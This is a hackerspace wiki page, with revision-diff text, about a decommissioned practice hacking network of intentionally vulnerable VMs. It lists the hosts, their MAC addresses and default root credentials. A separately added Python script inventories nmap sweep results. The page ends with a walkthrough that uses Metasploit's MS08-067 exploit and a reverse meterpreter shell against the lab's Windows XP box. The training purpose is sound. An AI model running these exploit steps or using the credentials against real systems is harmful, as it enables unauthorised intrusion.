Warzone

From Interlock Rochester Wiki

(Difference between revisions)
(Etiquette)
[[image:warzonelogo.png|center]]

'''UPDATE --[[User:Antitree|Antitree]] 13:14, 8 February 2012 (EST): Warzone decommissioned for now.'''

The warzone is a playground for security hackers.  When joining this network you should assume that you will be attacked by other people on the network or the network itself.  For those interested, there are systems set up that are designed to be exploited in different ways.

Feel free to poke around the network, set up your own boxes and services, make a honeypot, pop a box, or just watch the traffic.

[[image:warzone.png|center|800px]]
* '''You break it, you bought it''':  If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up.  If all else fails, talk to [[user:antitree|antitree]].
* '''Take off your whitehat''': Please don't break in and fix a hole for someone else.  The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.

== How to join ==

Two options:

# join the wireless network with the ESSID "warzone". "AAAAAAAAAA I don't know the password!" You'll figure it out.
# connect your system into any of the bottom two network jacks around the space

== On the network ==

=== Vulnerable Hosts ===

==== Damn Vulnerable Linux 00:0C:29:A6:83:1D ====

http://www.damnvulnerablelinux.org

Designed to be a fully functioning Linux server with misconfigured/exploitable services.  Can you find which ones?

==== De-ICE 100 00:0C:29:C0:6A:A4 ====

http://www.de-ice.net

De-ICE 100 is the first of a set of incrementally challenging vulnerable LiveCDs. 100 starts you out with the same kind of services as DVL.  Check out their website for the storyline that goes along with it.

==== De-ICE 110 00:0C:29:C8:8E:3A ====

http://www.de-ice.net

De-ICE 110 is the second level of the De-ICE series of vulnerable LiveCDs.  Check the website for the storyline that goes along with this server.

==== Windows XP SP2 00:0C:29:B1:0F:1C ====

Home brew

This is a standard Windows XP image based on the images from the FDCC project.  It was originally designed from the Metasploit Unleashed training servers.  There is nothing particularly special about it, but it is an unpatched system running some extra services.  Some of us have already started to make a tagging board for fun.

==== Damn Vulnerable Web App 00:0C:29:C8:8E:3A ====

http://sourceforge.net/projects/dvwa/

Created by OWASP, DVWA attempts to be a simple web service that was horribly designed.  XSS, SQLi and remote file inclusion are just a few of the problems.

==== BadStore 123 00:14:22:0b:4a:3e ====

http://www.badstore.net/downloads/BadStore_net_v1_2_Manual.pdf?n=52

=== Service Providers ===

Not designed to be hacked, but for setting up or providing test services.

==== ESX 4.0 ====

VMware ESX provides most of the systems that are available on the network.

192.168.1.10

==== Asterisk ====

http://www.asterisk.org/

This is not a distribution designed to be vulnerable, but rather a VoIP system for testing vulnerabilities in this type of server.

Login: root/rochesterhackers

==== Backtrack 4 Final ====

http://www.backtrack-linux.org

Not designed to be a vulnerable system, but it does have all the tools you'll need to exploit the rest of the network.  Log in with SSH and use it to pivot through the rest of the network. Username is root and password is toor.  All settings are persistent between reboots.
 
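As an added example (not part of the original wiki page), the following Python script turns the output of the ping sweep (<code>nmap -sP 192.168.1.0/24</code>) into an inventory of the warzone, labelling each host by the MAC addresses listed in the Vulnerable Hosts section above. The scan text is constructed, not a real capture; the <code>LAB_HOSTS</code> table is copied from the headings above. It reports which lab VMs did not answer (handy for checking the range is intact after someone has been hacking away) and, because the page lists the same MAC for De-ICE 110 and DVWA, flags that collision instead of silently picking one.

```python
import re
from collections import defaultdict

# Known lab VMs: label -> MAC, copied from the Vulnerable Hosts headings above.
LAB_HOSTS = {
    "Damn Vulnerable Linux": "00:0C:29:A6:83:1D",
    "De-ICE 100": "00:0C:29:C0:6A:A4",
    "De-ICE 110": "00:0C:29:C8:8E:3A",
    "Windows XP SP2": "00:0C:29:B1:0F:1C",
    "Damn Vulnerable Web App": "00:0C:29:C8:8E:3A",
    "BadStore 123": "00:14:22:0b:4a:3e",
}

# Constructed sample of nmap ping-sweep normal output (not a real capture).
# The scanning host itself (192.168.1.202 here) never gets a MAC line.
SAMPLE_SCAN = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2012-02-08 13:00 EST
Nmap scan report for 192.168.1.10
Host is up (0.00021s latency).
MAC Address: 00:50:56:A1:B2:C3 (VMware)
Nmap scan report for 192.168.1.200
Host is up (0.00050s latency).
MAC Address: 00:0C:29:B1:0F:1C (VMware)
Nmap scan report for 192.168.1.201
Host is up (0.00044s latency).
MAC Address: 00:0C:29:C8:8E:3A (VMware)
Nmap scan report for 192.168.1.202
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.51 seconds
"""

SCAN_REPORT = re.compile(r"^Nmap scan report for (\S+)")
MAC_LINE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.*)\))?")


def parse_ping_sweep(text):
    """Return a list of {'ip', 'mac', 'vendor'} dicts, one per host that was up."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = SCAN_REPORT.match(line)
        if m:
            current = {"ip": m.group(1), "mac": None, "vendor": None}
            hosts.append(current)
            continue
        m = MAC_LINE.match(line)
        if m and current is not None:
            current["mac"] = m.group(1).lower()
            current["vendor"] = m.group(2)
    return hosts


def mac_index(lab_hosts=LAB_HOSTS):
    """Map each lower-cased MAC to every label that claims it (a list, so
    duplicate entries in the wiki table are preserved rather than overwritten)."""
    index = defaultdict(list)
    for label, mac in lab_hosts.items():
        index[mac.lower()].append(label)
    return index


def classify(hosts, lab_hosts=LAB_HOSTS):
    """Return (ip, mac, status) tuples; status is the lab label, a collision
    warning, 'unknown host' for a member's PoB, or a note when no MAC was seen."""
    index = mac_index(lab_hosts)
    results = []
    for h in hosts:
        if h["mac"] is None:
            status = "no MAC (scanning host itself, or not on the local segment)"
        elif h["mac"] in index:
            labels = index[h["mac"]]
            if len(labels) > 1:
                status = "AMBIGUOUS: MAC listed for " + " / ".join(labels)
            else:
                status = labels[0]
        else:
            status = "unknown host (member PoB?)"
        results.append((h["ip"], h["mac"], status))
    return results


def missing_lab_hosts(hosts, lab_hosts=LAB_HOSTS):
    """Lab VMs whose MAC did not show up in the sweep, in table order."""
    seen = {h["mac"] for h in hosts if h["mac"]}
    return [label for label, mac in lab_hosts.items() if mac.lower() not in seen]


if __name__ == "__main__":
    found = parse_ping_sweep(SAMPLE_SCAN)
    for ip, mac, status in classify(found):
        print(f"{ip:<16} {mac or '-':<18} {status}")
    print("Not answering:", ", ".join(missing_lab_hosts(found)) or "none")
```

Feed it a real sweep with <code>nmap -sP 192.168.1.0/24 > sweep.txt</code> and <code>parse_ping_sweep(open("sweep.txt").read())</code>; hosts that are down stay in the "not answering" list, which is the quickest way to see whether a box needs bringing back up under the "you break it, you bought it" rule.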
== Your first Metasploit Reverse Shell ==

Steps to hack your first system:

* ssh into the backtrack box (usually 192.168.1.202)
* username root, password toor
* run a ping sweep of the network
 nmap -sP 192.168.1.0/24
* review the IPs and find where the Windows XP box is hiding
* start metasploit
 /pentest/exploits/framework3/msfconsole
[[image:warzone1.png|thumb]]
* at the console, use the MS08_067 Netapi exploit
 msf > use exploit/windows/smb/ms08_067_netapi
* type show options to see what values are needed
* set the remote host to the IP address you found above
 msf > set RHOST 192.168.1.200
* change the default port from 445 to 139
 msf > set RPORT 139
[[image:warzone2.png|thumb]]
* set the payload to the reverse meterpreter shell
 msf > set PAYLOAD windows/meterpreter/reverse_tcp
* set the local host to backtrack's IP so the shell knows where to connect back to
 msf > set LHOST 192.168.1.202
* attack!
 msf > exploit

If you have everything correct, you should get a meterpreter prompt.  Now what can you do??....

== Next Steps ==

* add an onion topology: make multiple layers of the network and have some boxes bridge between the other networks. Attackers have to break into one system to get to the next network.
* set up standard backups using a virtual appliance
* add more systems from this resource: http://sourceforge.net/projects/virtualhacking/files/

Revision as of 18:14, 8 February 2012

Warzonelogo.png

UPDATE --Antitree 13:14, 8 February 2012 (EST): Warzone decommissioned for now.

The warzone is a playground for security hackers. When joining this network you should assume that you will be attacked by other people on the network or the network itself. For those interested, there are systems set up that are designed to be exploited in different ways.


Warzone.png

Rules

None

Etiquette

  • DOS is for newbs: Denial of service attacks are always possible with this setup. Intentional simple denial of service attacks (like ARP poisoning to nowhere or crashing switches) will be met with frowny faces and "pfffs" from your fellow members.
  • You break it, you bought it: If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up. If all else fails, talk to antitree.
  • Take off your whitehat: Please don't break in and fix a hole for someone else. The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.